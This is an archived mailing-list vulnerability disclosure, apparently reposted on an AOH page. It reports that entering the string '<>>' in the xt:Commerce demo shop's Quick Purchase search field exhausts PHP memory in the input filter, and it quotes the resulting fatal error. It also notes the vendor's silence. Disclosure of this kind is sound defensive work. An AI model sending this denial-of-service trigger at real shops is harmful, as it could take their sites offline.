AOH :: HP Unsorted X :: BX3296.HTM

xt:Commerce possible DoS



xt:Commerce possible DoS
xt:Commerce possible DoS



Hello,=0D
=0D
I've found a suspicious behavior of the xt:Commerce shop software (only verified in their demo shop).=0D
=0D
When entering "<>>" as a search query in the Quick Purchase field at the left side of the shop, I get:=0D
=0D
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 8388611 bytes) in /is/htdocs/wp1052946_X4Y7B4PF21/www/includes/classes/class.inputfilter.php on line 136=0D
=0D
This looks very much like a problem in the input filter that causes too much memory to be allocated (and that could of course be used for DoS)=0D
=0D
Unfortunately, the source code is not available freely, so I cannot investigate this further. If anyone has the source code available, feel free to check out the specific region in the input filter.=0D
=0D
I informed the company but they closed my ticket without any response, and even after I reopened it, there hasn't been any feedback for almost 2 weeks now.=0D
=0D
=0D
Best regards,=0D
=0D
=0D
Christian Holler

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.